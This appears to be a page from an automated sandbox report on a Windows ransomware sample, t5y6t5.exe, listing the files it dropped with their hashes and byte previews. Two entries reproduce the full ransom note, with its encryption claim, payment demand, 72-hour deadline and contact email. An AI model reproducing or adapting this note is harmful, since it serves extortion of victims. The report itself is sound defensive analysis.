                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:OpenPGP Public Key
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.83849152678194
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GLTkOHc5ZoU/pM+vypqEZJESdFdo6n3JGvM6esfmNJcZ:iZ8hBfuqwESz668TeymNJq
                                                                                            MD5:BD4544D3A63F59855F6EFECB25C691C4
                                                                                            SHA1:8DEC829C2FA68D1AF6385DF5D08EE7F2355B7E79
                                                                                            SHA-256:E032C9EC8857314E83D4D5390436A1ADC802D93466C69D84FAD8795CF3B8C268
                                                                                            SHA-512:06B7522B773938DB835A748837870F3040A45226F2B96789A3CD3625CDA6B7B35CD21ADEE38492EC4ECC9BCF77D5B03C9F21CAB4515F183A0CF1CFC69A46AFCD
                                                                                            Malicious:false
                                                                                            Preview:...i...QX....-Z).........Uje./...h..%..y..;.8.....@.{.......?E.U_..v.~.......DT.F{.k..N*Lb.o..C.b...;c.z.Qm.....&7N..0....\.cK.....V.u...e.h..vT.7...P9<..xL..M..'` J.Zo!. .]..-i@`.b1..+?.#...0..k.^"7.~.).9We.C%..u..A..fk...:...(<E;W`..p.oq.6S..rp..>.QV.i....*E.#{.=.=.X.)|..m..=LWD:..zy2.G.....{....R..h...m.K~EI6..$J..;.P.x..zEP...h....|m......D...g..8..p0..F.[d...#.<.wDN4ad{..i.......Ag.....R.Q.KN..'...tRl......(...bf.....N..o...3I.V7.3t..`.99..v...C..P........K..B..l!...J.`...n.!/.v..v.$3.......Nd..s.=...p.Q!.._SL....F.b...e.>bT......U.,.|...U._Q..K?.H..:0ErF.1.m......_R.v(.UH.qn#xd....#%.....'(gh...9edU"..R..p...]A..+'.^j.%3.F."'"..u...vx.P.q.. .N...dQL./..B..Iz........D..... ...`+... Q...kP......x+m-!i.......A.$W_.v*gvPmc...c~..T.Q..G[:|...#.cl..{f.lON..!..lH....g..y|i...v..t.A..As....ab0..d..N2..!.....g.DM.N.]...U2M..o...<m...W..h.!.e.9..Kd.]I...nM"u.....%ZIX....i...}R.m..=o..z.n....z...P..g6.=.&FB.............T........I..3...(U..
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.828966745050028
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:KCWFp5JsL14SvUej+obdKP4lnnu0isnvLMDYt/ivxWevAN0seG+/y36gFl:KCWFp5Jev0obdnnn6svLMMtavcEACseK
                                                                                            MD5:8A34D2D6C14D77BFE24855F8C83D31BD
                                                                                            SHA1:4756553DF802EDD1CE385CDCE1FD2627A8403783
                                                                                            SHA-256:4FCE69C4F3866E5D042C3F15F1B6BE8BA691B0412A208E921AE38D0476D2FD52
                                                                                            SHA-512:E43DBDDFC6F33EB0655B69833A9A9A0A01D08604545827020656ECA0E16E9AF314E584FFD10748700897610FD86EFBA705033AA082309B2E025C607C03703597
                                                                                            Malicious:false
                                                                                            Preview:.o.v.wW.8..y..1....7....!.&.|...G.H=...`...[t..i......u.@.....P.g.......t..\.......Et...G..Ws...-5gW(g.3_p..AfF.Tv...vb.cr[.....LK....K.A>.D...1X2..v.u..@..Nk..*Z`......s..P1c.wv.p.:...'.y....=Y.H......|b"..{..w.JQ.8.5...WHmw..X_T=.c^..f^3.......)*.Xs}.f...Z}...c..7...C.....o.p5v.Q.a.....h).kA.6gp.Tp0....z.t..]~l..M~*.p8.F....F'.g...n@...r......z"O.@...N.....q..)..<..&i.&..`.a..V'7..A...;.'}....Nw0.S.e..........d/....j..a.6....\Mk[..!O.{7.......'.j|.Q&|P..<.)..'.1..]9...7...R.b.$...N.#Fo&.......x|.iEC.y..s.._..H..a.Q..B.&..Q7.l=Q..b....d@.n.f..0q...zp6I.Z.A.^6m.....j.i...<....f.tN.......5...8.....-`........&............&T.0@..H9cC.{...C..X..~.*Dt..n4}.j0`..v`...&..f.j..1>.." .1,.MY[...m..TQd..h$.-6..7..bc.<..[..*.N.........n..p.ZlDN.......1..C.&.L..xZ.t0,.r..74......g....t#..*..@,..Ey.A...5.W.....2.5.n.)5J$.7.xSw.......a........9|.r.}..........A...........a...;........:.M..F....V............2..K+:}D..8.....]~0..Lk..h....+rdYN.u&.qk....r.&.
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.828966745050028
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:KCWFp5JsL14SvUej+obdKP4lnnu0isnvLMDYt/ivxWevAN0seG+/y36gFl:KCWFp5Jev0obdnnn6svLMMtavcEACseK
                                                                                            MD5:8A34D2D6C14D77BFE24855F8C83D31BD
                                                                                            SHA1:4756553DF802EDD1CE385CDCE1FD2627A8403783
                                                                                            SHA-256:4FCE69C4F3866E5D042C3F15F1B6BE8BA691B0412A208E921AE38D0476D2FD52
                                                                                            SHA-512:E43DBDDFC6F33EB0655B69833A9A9A0A01D08604545827020656ECA0E16E9AF314E584FFD10748700897610FD86EFBA705033AA082309B2E025C607C03703597
                                                                                            Malicious:false
                                                                                            Preview:.o.v.wW.8..y..1....7....!.&.|...G.H=...`...[t..i......u.@.....P.g.......t..\.......Et...G..Ws...-5gW(g.3_p..AfF.Tv...vb.cr[.....LK....K.A>.D...1X2..v.u..@..Nk..*Z`......s..P1c.wv.p.:...'.y....=Y.H......|b"..{..w.JQ.8.5...WHmw..X_T=.c^..f^3.......)*.Xs}.f...Z}...c..7...C.....o.p5v.Q.a.....h).kA.6gp.Tp0....z.t..]~l..M~*.p8.F....F'.g...n@...r......z"O.@...N.....q..)..<..&i.&..`.a..V'7..A...;.'}....Nw0.S.e..........d/....j..a.6....\Mk[..!O.{7.......'.j|.Q&|P..<.)..'.1..]9...7...R.b.$...N.#Fo&.......x|.iEC.y..s.._..H..a.Q..B.&..Q7.l=Q..b....d@.n.f..0q...zp6I.Z.A.^6m.....j.i...<....f.tN.......5...8.....-`........&............&T.0@..H9cC.{...C..X..~.*Dt..n4}.j0`..v`...&..f.j..1>.." .1,.MY[...m..TQd..h$.-6..7..bc.<..[..*.N.........n..p.ZlDN.......1..C.&.L..xZ.t0,.r..74......g....t#..*..@,..Ey.A...5.W.....2.5.n.)5J$.7.xSw.......a........9|.r.}..........A...........a...;........:.M..F....V............2..K+:}D..8.....]~0..Lk..h....+rdYN.u&.qk....r.&.
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.843160715034238
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:AzAJd9/BlQC/YLUmh+CE0BMZzRsiNOo/pwqi50bbffYTnQ+:6A/9/YH3+OiZVx/pw/5Sb8
                                                                                            MD5:E62AA6F9C3019DB681D45642BDCCEC95
                                                                                            SHA1:6FC1F35FD9BB5E735D4E004602BC1A75FA9A3540
                                                                                            SHA-256:6C4100E4EF142EA9FF27A2AA8F6023BD136CC13A7E4E0F02BE53954CDDA5222D
                                                                                            SHA-512:61A26814292E1420B299F692960BDCA3CD09FB7716F18BA1C2B8B6439155C4075F2E870F019AB4BEECFDC19C26F03D394BF00E71D810802A96580633CAEA795B
                                                                                            Malicious:false
                                                                                            Preview:.8].j0.].T[.y.I....7(.F.6..Cl.|D.?....Mw..VJ...`.....k.:.1\...92b...\..bou....N...b..$*.C.l....}.R).....6....W....!U:...b0...^..D.....XG1u..!D.y...B...h..........Y7Q.\.....N"..Rj.?V.d3%.:..........\.2n..K...-.M.a..J.v.....aX.9../....|.....C.QH.R...3..X.R........Cg.b~...3q_57....K;..w}...e..`j.6J.(.._H...).w.?2............J.!..]'$s.....kLb.d.....|.Vc. j0"`.....q.<z.!&.....I.HJa.+...,....lt...,t...."{.nV._P. <.B..2Z.l:...p"R..S.3...s`.O.....:.WQ..8.&.U...$h.g,X...c..5<x....%BS.5.<.P......>.......}.) ....U..7......J......jk.dZU..!.....7p.m..d..|.c...iF..m.I.c.L.G..=. .~.V......v..'!...w.......F..1c.!.^o...u.{..fo.H....>.@..63b.gU..(..,D.2..#.f..i ..a..0....4..,.....7.U.4.......:.<...".]t....iP.CM.R..Z.Q.e.u...u8....G.h.o~....pP}k!.r..0D.......;..1.h.l...5q%.n~~"Ymd...3jW..9.g..P..>a.S.f8...*xo(..F.y....C.. ........4!.rL.#.+..`.U.'.7B....y.."...]..,=.Z...y5.]Nbr..Y:u.+...Z..Y.....I....B...r.......G[3.l.u[.-.r.>.#^.8....S.O7,p....YU
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.843160715034238
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:AzAJd9/BlQC/YLUmh+CE0BMZzRsiNOo/pwqi50bbffYTnQ+:6A/9/YH3+OiZVx/pw/5Sb8
                                                                                            MD5:E62AA6F9C3019DB681D45642BDCCEC95
                                                                                            SHA1:6FC1F35FD9BB5E735D4E004602BC1A75FA9A3540
                                                                                            SHA-256:6C4100E4EF142EA9FF27A2AA8F6023BD136CC13A7E4E0F02BE53954CDDA5222D
                                                                                            SHA-512:61A26814292E1420B299F692960BDCA3CD09FB7716F18BA1C2B8B6439155C4075F2E870F019AB4BEECFDC19C26F03D394BF00E71D810802A96580633CAEA795B
                                                                                            Malicious:false
                                                                                            Preview:.8].j0.].T[.y.I....7(.F.6..Cl.|D.?....Mw..VJ...`.....k.:.1\...92b...\..bou....N...b..$*.C.l....}.R).....6....W....!U:...b0...^..D.....XG1u..!D.y...B...h..........Y7Q.\.....N"..Rj.?V.d3%.:..........\.2n..K...-.M.a..J.v.....aX.9../....|.....C.QH.R...3..X.R........Cg.b~...3q_57....K;..w}...e..`j.6J.(.._H...).w.?2............J.!..]'$s.....kLb.d.....|.Vc. j0"`.....q.<z.!&.....I.HJa.+...,....lt...,t...."{.nV._P. <.B..2Z.l:...p"R..S.3...s`.O.....:.WQ..8.&.U...$h.g,X...c..5<x....%BS.5.<.P......>.......}.) ....U..7......J......jk.dZU..!.....7p.m..d..|.c...iF..m.I.c.L.G..=. .~.V......v..'!...w.......F..1c.!.^o...u.{..fo.H....>.@..63b.gU..(..,D.2..#.f..i ..a..0....4..,.....7.U.4.......:.<...".]t....iP.CM.R..Z.Q.e.u...u8....G.h.o~....pP}k!.r..0D.......;..1.h.l...5q%.n~~"Ymd...3jW..9.g..P..>a.S.f8...*xo(..F.y....C.. ........4!.rL.#.+..`.U.'.7B....y.."...]..,=.Z...y5.]Nbr..Y:u.+...Z..Y.....I....B...r.......G[3.l.u[.-.r.>.#^.8....S.O7,p....YU
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.83084787385367
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:moksjn2ZzlGtRDlABv/F+Uhu0QofQUAvkwSE0gtkc5HGw:mNsjn2BlGjhaXFVkEQUAvkwSE0ZsHGw
                                                                                            MD5:638AABF682854408B8273E948EB7CA1B
                                                                                            SHA1:E70057CE8CF902E632578FF0FDD36D167548926F
                                                                                            SHA-256:A4E3FCE8C58D7FD51B4078F3D86FE7358CACACA3236BEDE6C492381B97EFAEAB
                                                                                            SHA-512:380AD5B16CBA761B3C3F299E28E6B7E91525817070194B98B4A7A7C9278A6BE16CD3A528F48CD9C15042C067C80FE979ADE92FCB3A863F8B4D91B0D790DD2FD8
                                                                                            Malicious:false
                                                                                            Preview:TH. =\..n.x.N....1.ddI.l.h. X..<.........[4w.<{...V..tc...m..sP..R.*./.J..27.u...^XJ`z@.m....g.5.3.i8.T+@.h...A.. ..........|.[...<....0..4.={....pW ....s..E.b.VDC.!N.W.0...!...h..fm..<..g....w...h...k....L..V.Z<...n.hn..k.5.]..... ^9.@.h..4.UAG..YD]....-.zk.zy.].....k.U...X...,r.3a..~.9}../z!...w.GR...C.P.Q.Aj.Bd.. ..(..J..-..;e...g..{it.....(0......}).U.t.~tg.....{.T./.......`n.k?..mjB. ...k..:V.V.. ...ml. J...c..1s..j.......x.a.w...>.7......./.h..'..*...._..c..5.r...';<.._......?q...e..E..3X@.ey.:}..3.......?.....I....:ag.p?v.~.....(!.88.@....,E..#...W.LAR.....8.....i..S.O..]u..YXU.Vf...;.Y:H....Jd..U.M..7.Pn....?X....sO.5.d.C.e..WC._5X.....\..y..).h.t.;`.f8...<..)..5,!..C..R<.]_.!.....w.n.G.{...kB.....o..:..Got.F.+!,x.B..H.90h.......YoI$.T6!*t..5..5.R+..X.:M....h..8r.U.i.=h.-..:..A..i....]l..4....&.bg.......:.Y..G.X..{PS...]...`|....e`../'.C*...h..c....\.+E.V....LB....(......q....w@..td.....7........Z.H....l]..c...;/.S......S...E%^=6........
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.83084787385367
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:moksjn2ZzlGtRDlABv/F+Uhu0QofQUAvkwSE0gtkc5HGw:mNsjn2BlGjhaXFVkEQUAvkwSE0ZsHGw
                                                                                            MD5:638AABF682854408B8273E948EB7CA1B
                                                                                            SHA1:E70057CE8CF902E632578FF0FDD36D167548926F
                                                                                            SHA-256:A4E3FCE8C58D7FD51B4078F3D86FE7358CACACA3236BEDE6C492381B97EFAEAB
                                                                                            SHA-512:380AD5B16CBA761B3C3F299E28E6B7E91525817070194B98B4A7A7C9278A6BE16CD3A528F48CD9C15042C067C80FE979ADE92FCB3A863F8B4D91B0D790DD2FD8
                                                                                            Malicious:false
                                                                                            Preview:TH. =\..n.x.N....1.ddI.l.h. X..<.........[4w.<{...V..tc...m..sP..R.*./.J..27.u...^XJ`z@.m....g.5.3.i8.T+@.h...A.. ..........|.[...<....0..4.={....pW ....s..E.b.VDC.!N.W.0...!...h..fm..<..g....w...h...k....L..V.Z<...n.hn..k.5.]..... ^9.@.h..4.UAG..YD]....-.zk.zy.].....k.U...X...,r.3a..~.9}../z!...w.GR...C.P.Q.Aj.Bd.. ..(..J..-..;e...g..{it.....(0......}).U.t.~tg.....{.T./.......`n.k?..mjB. ...k..:V.V.. ...ml. J...c..1s..j.......x.a.w...>.7......./.h..'..*...._..c..5.r...';<.._......?q...e..E..3X@.ey.:}..3.......?.....I....:ag.p?v.~.....(!.88.@....,E..#...W.LAR.....8.....i..S.O..]u..YXU.Vf...;.Y:H....Jd..U.M..7.Pn....?X....sO.5.d.C.e..WC._5X.....\..y..).h.t.;`.f8...<..)..5,!..C..R<.]_.!.....w.n.G.{...kB.....o..:..Got.F.+!,x.B..H.90h.......YoI$.T6!*t..5..5.R+..X.:M....h..8r.U.i.=h.-..:..A..i....]l..4....&.bg.......:.Y..G.X..{PS...]...`|....e`../'.C*...h..c....\.+E.V....LB....(......q....w@..td.....7........Z.H....l]..c...;/.S......S...E%^=6........
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):377
                                                                                            Entropy (8bit):7.44859489528024
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:Ztz3CXsOI+YjkLLUE58/LGTzvG1QjPLwdWcLl57nSoosgfnd/WuxPJ2K/r7stAhQ:b3hDzgE2C1QzLwMcLTAf97xzrpSn
                                                                                            MD5:15E794EBE96852357435AEB4BB45D3BD
                                                                                            SHA1:05015188A1047A4415D7EA20A11D56EA7B26DCB5
                                                                                            SHA-256:3A98728545FA21134C95FA2BF95CC232CB0006C2302F31295B6E6C3488CCAEE0
                                                                                            SHA-512:59A81844CD423F5A593003999CC01D72FDE982927B41A09ACE95360C1E36FC93789682BC229C294F73CE23F39EA0DABF619A091AF33946423F059A9C1C48CA54
                                                                                            Malicious:false
                                                                                            Preview:_.B`K..c{....lj?[11....;...-..2....{..5}i.Q.^....B2p2.cW.....*.q..<.S..r'8aK....w.i..7o#.....w.amazon.com/..|....Y..L..D.).<.j...a.......D...s.Bfl...N.?CQ.@..5....2..O..`...MiLu..&.?.y....6.s...Q.3V[.t"w..;9.?.n./qd......Y..a...Z..E..w .4.....lO..J..Z..0k.S....c.........Lz{b?..U.....K*..R.....%...i......V.'....`.qV. ..#.!.EA...9.<Y....4...76......]C.0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):474
                                                                                            Entropy (8bit):7.574161552908091
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:T8VwRd9BA7tRMv24oJ6KJFTdK8zWSBeEDtc7n:T8VkBqRMMJFT1vhU
                                                                                            MD5:C6B585090D71D9EE23D2C41A0B037668
                                                                                            SHA1:CD5C27E272741641B2F5AC31859E511D991A47BE
                                                                                            SHA-256:7B2452FE502A53ABF049EFF488BABB3D19C1DDDB59AEDEFB93FD6C11DFE78DDB
                                                                                            SHA-512:6F5493751630C80648D4F07722A0CA63F788451C7B52DF3BC9FF0E7D592EA0B0DD082FB113E8CB85CA128872A33ABD1227FC01E4A7EE2E4E06326779F6B8A02F
                                                                                            Malicious:false
                                                                                            Preview:.J...2Qo.E.h...o....b...J.i...a?..Y....:......0..co.i;.......Q.'.:....^A...-..n...o;....u.....Yq....~c./....(....H.K..4.D.d-(..;.......mr`.=..?MH...*...p....(..4..<{..3...[o.......%\.#..mages\bing.ico..{{.....z.&PGX.|...(/4..y..[....8..o.|....m%=..v...r..e..t.......-.....D..o....s 9W./..sR._....W.c.Bv.....,..;..w...v.p,.QK...].V&i(....l#.UK......GKk..w"86`.D....Lpf~'yJy....C.[.Ml.in.-..Mo...g..$).r}..]Cn-n..R.y..}.#M=....!..!..!....^..<...Ep0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):379
                                                                                            Entropy (8bit):7.442465451192671
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:VaUUz6Fi85DXLR0X83F8H9RFJBV/h4xu1ZLZLf8HrcdrcKbM4JI+Hn:V/Uz6Fi85DfFaRBJSeZLZL+wdrcZEI+H
                                                                                            MD5:312B57A222EA0FB34A11A30DF3DB1F9C
                                                                                            SHA1:A2B557FA6967488C9018C4A05CE47068058F4331
                                                                                            SHA-256:798B565AF37CA0C3510F63C19D06B923B2E13A878D75A1E204AAA4BCBE7705A4
                                                                                            SHA-512:0D551499F0C244CC500DC4C70647F5769D100EFEAD307767D70FB8E04EEA603BEA545D147A3E8E73C7E53FAF73B62F12472253A0413CF57A43C68CC505B09E15
                                                                                            Malicious:false
                                                                                            Preview:...=d..|V.<..>B.....sb.[......>......".5..a..N..9.i<PO..`.]..W...... f.m.d.@hM.7rm.\..E.......(.j.....|...[..l.._.0...p.....e...C..&.-.(...:...[.....HC..t<....j......F.:c...p.+..#.f....;.4...@...i.....O.>..<..y....{.r..I1R4.Rq!... ._..sXO|.....+.....a...N.P................?cTQ.I.."..(o..T....K....y.R.x!qa.f..w..P....|....K.....Dzzj....y.7r.,....>.F...0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):377
                                                                                            Entropy (8bit):7.476548283523894
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:CkgikwYTZjj93shObXYMYIcOvD/ELKaX83J1K2gU6ob3JfS0k9umJXDq5euVQkSn:IikXj93shObXYMvcO7W7X8J1Kqrq0k9H
                                                                                            MD5:540F671DD0FB4031338D78DC7B798099
                                                                                            SHA1:5B9FAD91A08A6DA4DB01F05D66CD4940D332D61A
                                                                                            SHA-256:7362D9E04505A9A60E458B1BC190A02258AADAD976094D284659F68376B3A691
                                                                                            SHA-512:ECB605409D93AE62DE73E4F16C52E821C48C9F16B6CCC9A64D88001F8F9B0DDBAE0530F493AC900A447BFC5CD7CA6219CC8A6F040B5C864564A9BC76BA897B41
                                                                                            Malicious:false
                                                                                            Preview:vgQ.g...<K...+......s]..Y.h......v.#.0.wa?J...h...+|........}......r.;.b~...2..KN]'..Vb..@w.google.com/.._..c......P....a...7..{..S6^N...-.,.J..........,R.X.3.0.Z.I....._...!;._....3..z+.o...."..rDx.^....+FX.k$........K.t.J......gN%...:...|.......C.l.1.\kh6=...3.O..H9...(.(=@X.^.....A.c......]X5.."..t........]......T...nx..dt.#...6.V....V.\....V.0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):375
                                                                                            Entropy (8bit):7.396875485348006
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:ybZCVBBlJcNvJKQngonJb+luNRhEvZBOnU6dqr+0PlfeUmutImn:eM7Bl0RKQn5b+lcRhEXd6dqNPwmn
                                                                                            MD5:641F59CC8A2142AAFE9A6DA5A53DC6DC
                                                                                            SHA1:D537467807064D7AE9827822492902A088A25EB5
                                                                                            SHA-256:24D9203C8221F9E9704792C4FE12FD8E2935537441F20AD6C82B59DC40015C88
                                                                                            SHA-512:295B6C56B2362F6ABE85CBAB05A5D2A2B1D588E33A9B14D4216DEE2E17439DD578F5E06D03AFFBA47E6BB5E0ADE24EBF114AC05E3A0926618BE28CFDCD096B93
                                                                                            Malicious:false
                                                                                            Preview:.UAKZ.....+mR......[;.Q.....vl.....T...V..H..=7k.*...m.`/...A$.U.A.(...0b.?.....F......bw.live.com/.....l,....\?.#.`&ys......N.........w.&.......l.....k....}e..l...o.......P$5...2.yC....D..X...E.....H.>.3..r.Kr.a.7.&v.5u...We0.....W=.9.$..z"._....o...%.x(8....]B..Z......U1@..]...2.:.".a..-.c.%...:..mI.p.'..U..qt.......&.......L.i/.>.B.I..f..0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):378
                                                                                            Entropy (8bit):7.423102313197335
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:FualOGLf+LvhW/+I1KpGvNVBqCn0WcbN9YYMiB9yAlbbPmqAc8HChPcfFEIYQ4wO:FuX0WbGvBqCuAYMUrbbPb8CPcf+FtwOn
                                                                                            MD5:1546A5D0B9EC3CD0B63B0E593033952D
                                                                                            SHA1:685F9395F6E3EBEBE3507D1D4F06421FAC5FB844
                                                                                            SHA-256:812957ECE73302BD3D60C6ADDE1A1BD9275C3A2646E744D6F7F7644C24FF083A
                                                                                            SHA-512:403A38AB69660CD2052E46641B761C4167B2339B8290CFECC3BA1084D5701B8004B856476D3614D6831C72A1303D9312FC57EC88D9E00C85DA9F12EDFEC56979
                                                                                            Malicious:false
                                                                                            Preview:...5...p.j...ip.<..U?q..h^.S..$..X].zPe..Ws.#.735.D../.O..........}.=..!b...^.... ../.fR...J.w.nytimes.com/.."j.....r...|.4.*..p_...$8...S:OV.J.n..!FZ..D....*.R.'AK./.......!E.....x.\ZY......Ogt.$u..Yaz.O9k..'|s}.@..\t.....s.~}...~...b#."Y.......j5......9.....D...r.{......w..:.E..='.j.0.n..I./.....q.../.%8......i....:j...sz..9.]....B.mV}..N..t..m-..v.Y*0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):377
                                                                                            Entropy (8bit):7.488144047799495
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:T9SfaIFX8gP8dAqicE6Zl4LrHPbM5SS3LENWxHrJ9B9bnOqmHn:TwJsgAriZ6wLrDM5SCyWBrB5nOqwn
                                                                                            MD5:0BB95D7944C7F218472362448821AA4D
                                                                                            SHA1:A7DA40A15CD2DBB75C3522BCDB7EF9ED483080EA
                                                                                            SHA-256:0EBB70291BBC470AF6708AB99753565D6E246092CAFE3C80684B14046744496F
                                                                                            SHA-512:83098581CAC967E12CDC06356A576C4A7BFDFC7EEEAAAF16FD5D46740C9BE84774AE636D68393ACCB1B89293E06CF5F87F2AD53B50E0F8ED8A655CF3275AE497
                                                                                            Malicious:false
                                                                                            Preview:.t.3.d.r...._..N.7..O.ZK.{2.&......gT.<.j..)..vL.`H...]..I.c.l..g..1.I..E}..9..b...O.`\..L.pw.reddit.com/..S~..&5.[#....Fy...1.A.._.a..k..#...*...t...9..l.!.u.....xa.b6.cs:D..!J.%."...n..........d1.e0.:/....O../B......?.q.a7l.$.^Y...N.B.Zd@6..>....)..=..l..~..Ji..I.RAn.._V.H.............YK".oU..3...lU...Ltr.J.,.m....A....>..p..*....q..:R.....V.'..0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):378
                                                                                            Entropy (8bit):7.4260213688792405
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YR2b2RST03FugJSXaxhhZCjOMojRc4+wZC7kLI1ajbP8214xlguYCa2QN7hkWATn:YRFSTOFuLkuQG4+Hh1an6/gZDzi4tsIU
                                                                                            MD5:DC79BCD2CE0A68977E300ADC0FADACC6
                                                                                            SHA1:A1B2443E23CC6EA57A4F593365CC0BBA5C4C78DA
                                                                                            SHA-256:40B68B116762A050B75CB7CA96E3214B33F06BD426118DD6EA4C6DBBC1C7EF44
                                                                                            SHA-512:554ADBC4EE63B56A08036D5BDBAF68668DAB5389DB67807EFF34E98E15B323CA8F73E8BD242534DB767BF556219E0D270EE3EAC6B44EFDA5E4670A9D41BA99C5
                                                                                            Malicious:false
